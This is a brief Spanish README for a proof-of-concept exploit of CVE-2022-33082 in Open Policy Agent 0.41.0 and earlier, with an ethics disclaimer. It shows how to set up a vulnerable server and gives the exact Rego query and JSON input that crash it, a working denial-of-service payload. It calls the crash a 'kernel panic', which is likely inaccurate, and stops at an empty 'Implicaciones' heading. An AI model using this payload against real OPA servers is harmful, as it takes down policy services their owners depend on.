CVE 2022-33082 Exploit
DESCARGO DE RESPONSABILIDAD
Este código se proporciona con fines ÉTICOS: comprender la vulnerabilidad y probar los sistemas propios o sistemas AUTORIZADOS. Al usarlo, aceptas actuar éticamente y no asumo ninguna responsabilidad si no actúas éticamente.
Este exploit funciona en versiones 0.41.0 y anteriores de Open Policy Agent (OPA). Instala una instancia de OPA en Linux para probarlo con este comando:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
Luego, navega a localhost:8181 en tu navegador web. Ingresa lo siguiente en los campos correspondientes
campo de consulta (código Go):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
El sitio web se bloqueará y la terminal que ejecuta el servidor reportará un kernel panic
Implicaciones